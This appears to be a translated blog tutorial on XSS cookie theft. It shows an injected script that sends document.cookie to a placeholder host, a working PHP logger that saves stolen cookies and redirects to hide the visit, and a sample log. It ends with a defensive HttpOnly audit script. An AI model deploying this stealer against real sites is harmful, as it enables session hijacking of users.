How cookies get stolen

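After you log in and the site sets your cookie, you browse many links, and some of those links may carry an XSS attack. When you click such a link, your information is captured by the attacker. Below is an example of how your cookie gets lost: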

1: A JavaScript snippet is injected into your page:

                 document.location = 'http://你的域名/test.php?cookie=' + document.cookie;
2: test.php

                    <?php
                    $cookie = $_GET['cookie']; // read the cookie value passed as a GET parameter
                    $ip = getenv ('REMOTE_ADDR'); // remote host IP address
                    $time=date('Y-m-d g:i:s'); // time in "year-month-day hour:minute:second" format
                    $referer=getenv ('HTTP_REFERER'); // referring page
                    $agent = $_SERVER['HTTP_USER_AGENT']; // user's browser type
                    $fp = fopen('cookie.txt', 'a'); // open cookie.txt, creating it if it does not exist
                    fwrite($fp," IP: " .$ip. "n Date and Time: " .$time. "n User Agent:".$agent."n Referer: ".$referer."n Cookie: ".$cookie."nnn"); // write to the file
                    fclose($fp); // close the file
                    header("Location: http://www.baidu.com"); // redirect the page to Baidu so the visit is less noticeable


3: You will find that your cookie has been recorded in the cookie.txt text file:

IP: 127.0.0.1n Date and Time: 2017-04-17 1:46:18n User Agent:Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0n Referer: http://www.peng.com/txt/list.htmln Cookie: _uab_collina=149205440484621044423064; cna=; _umdata=ED82BDCEC1AA6EB965D58E91AD8886D530A2859E495981D4ED736A22E8BD0323435E4B12DB4E092ACD43AD3E795C914CAC718B53F0EB5D63AFB8E48BA77A3485; l=AqWliNYwm9UPpZ0WZPsJYqrWtWvf6Fl0; isg=ArS044VFUAk7GcTFD6Yd8nlshHFoUNh3ql8fek4VSj_CuVQDdp2oB2o5T0qf; o2-webp=false; userInfoaccountclouds=1; ART_ID=bee0834056ff02284cee5542ddb936ff7fffffffnnn IP: 127.0.0.1n Date and Time: 2017-04-17 1:48:40n User Agent:Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0n Referer: http://www.peng.com/txt/list.htmln Cookie: _uab_collina=149205440484621044423064; cna=; _umdata=ED82BDCEC1AA6EB965D58E91AD8886D530A2859E495981D4ED736A22E8BD0323435E4B12DB4E092ACD43AD3E795C914CAC718B53F0EB5D63AFB8E48BA77A3485; l=AqWliNYwm9UPpZ0WZPsJYqrWtWvf6Fl0; isg=ArS044VFUAk7GcTFD6Yd8nlshHFoUNh3ql8fek4VSj_CuVQDdp2oB2o5T0qf; o2-webp=false; userInfoaccountclouds=1; ART_ID=bee0834056ff02284cee5542ddb936ff7fffffffnnn
This is how your information leaks, so do not store important information in cookies.
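
The injected script above can only send what `document.cookie` returns, and browsers leave cookies marked `HttpOnly` out of that string. The following is an added example, not part of the original article: it audits a response's `Set-Cookie` headers and lists the cookies such a script could read. The function names and the sample headers are constructed for illustration.

```javascript
// Added example: find cookies that page scripts (document.cookie) can read.
// parseSetCookie, auditCookies and scriptReadableNames are hypothetical helper names.

function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const first = parts.shift() || '';
  const eq = first.indexOf('=');
  if (eq < 1) return null; // no cookie name: skip malformed header
  const cookie = {
    name: first.slice(0, eq).trim(),
    httpOnly: false, secure: false, sameSite: null,
  };
  for (const attr of parts) {
    const [rawKey, ...rest] = attr.split('=');
    const key = rawKey.trim().toLowerCase(); // attribute names are case-insensitive
    if (key === 'httponly') cookie.httpOnly = true;
    else if (key === 'secure') cookie.secure = true;
    else if (key === 'samesite') cookie.sameSite = rest.join('=').trim().toLowerCase();
  }
  return cookie;
}

function auditCookies(headers) {
  const findings = [];
  for (const c of headers.map(parseSetCookie)) {
    if (!c) continue;
    const issues = [];
    if (!c.httpOnly) issues.push('readable by document.cookie (no HttpOnly)');
    if (!c.secure) issues.push('also sent over plain HTTP (no Secure)');
    if (!c.sameSite) issues.push('no SameSite attribute');
    if (issues.length) findings.push({ name: c.name, issues });
  }
  return findings;
}

// Names of the cookies an injected script would be able to send away.
function scriptReadableNames(headers) {
  return headers.map(parseSetCookie).filter((c) => c && !c.httpOnly).map((c) => c.name);
}

// Constructed sample Set-Cookie headers (not taken from any real site).
const SAMPLE_HEADERS = [
  'session_id=constructed-value; Path=/',
  'auth=constructed-value; Path=/; HttpOnly; Secure; SameSite=Lax',
  'theme=dark; Path=/; secure; samesite=strict',
];

console.log(JSON.stringify(auditCookies(SAMPLE_HEADERS), null, 2));
```

Any session or login cookie that shows up in the output of `scriptReadableNames` should be reissued with `HttpOnly` (and `Secure`) set.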



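Copyright notice: this is an original article by liupeng19950522, licensed under CC 4.0 BY-SA. When reposting, please include a link to the original source and this notice.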